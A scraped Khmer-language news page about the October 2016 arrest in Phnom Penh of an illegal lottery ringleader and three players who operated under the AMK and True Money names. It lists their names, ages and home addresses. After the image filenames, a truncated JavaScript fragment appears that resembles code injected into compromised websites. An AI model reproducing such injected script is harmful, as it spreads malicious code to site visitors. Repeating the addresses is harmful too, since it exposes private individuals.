ព្រឹតិ្តការណ៍ថ្មីៗ

បញ្ជូនមេកន្ទុយលេខជ្រកក្រោមយីហោ AMK និង True Money ទៅតុលារ

1 ឆ្នាំ មុន 1 តូ សុផល

ភ្នំពេញ៖ មេកន្ទុយលេខ និងអ្នកចាក់ ៤នាក់ ត្រូវបាននគរបាលខណ្ឌសែនសុខបញ្ជូនទៅកាន់សាលាដំបូងរាជធានីភ្នំពេញនៅព្រឹកថ្ងៃទី១៩ តុលា ២០១៦ នេះក្រោយពីឃាត់ធ្វើការសាកសួរបណ្តោះអាសន្នចំនួន២ថ្ងៃ។ក្នុងនោះឃាត់ខ្លួនមេកន្ទុុលខេឈ្មោះ លី ថារី ភេទស្រី អាយុ ៣២ឆ្នាំ មុខរបរ ស្នាក់នៅផ្ទះលេខ៤៥D ផ្លូវសំរោងអណ្ដែត ភូមិរោងចក្រ សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ ស្រុកកំណើតភូមិដំណាក់ព្រីង ឃុំមហាលាភ ស្រុកកោះសូទិន ខេត្តកំពង់ចាម។

ទី២ កង ពេជ្ជនី ភេទស្រី អាយុ ៤១ឆ្នាំ ជនជាតិខ្មែរ ស្នាក់នៅផ្ទះជួល ផ្លូវបេតុង ភូមិបាយ៉ាប សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ។ (កូនកញ្ច្រែក)

ទី ៣ សុខ ចំរើន ភេទប្រុស អាយុ ៤៦ ជនជាតិខ្មែរ  ស្នាក់នៅផ្ទះជួល ផ្លូវបេតុង ភូមិបាយ៉ាប សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ មុខរបររត់ម៉ូតូឌុប។

ទី៤ សេង សារឿន ភេទប្រុស អាយុ ៤៩ ជនជាតិខ្មែរ  ស្នាក់នៅផ្ទះជួល ផ្លូវបេតុង ភូមិបាយ៉ាប សង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ មុខរបរ សន្តិសុខ។

លោកវរសេនីយ៍ឯក ម៉ក់ ហុង អធិការខណ្ឌបានមានប្រសាសថាដោយមានបទបញ្ជារពីលោកអគ្គស្នងការរងនិងជាស្នងការរាជធានីភ្នំពេញនិងដោយមានការសំរបសំរួលពីលោក សេង ហ៊ាង ព្រះរាជអាជ្ញរងនៃអយ្យការអមសាលាដំបូងរាជធានីភ្នំពេញបានចុះសហការណ៍និងបង្ក្រាបជាក់ស្តែង កាលពីវេលាម៉ោង១៥និង០០នាទីរសៀល ថ្ងៃទី១៦ ខែតុលា ឆ្នា២០១៦ស្ថិតនៅ ក្នុងភូមិរោងចក្រ សង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខ ។

img_9578 img_9581 img_9583 img_9587 img_9589 img_9595var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ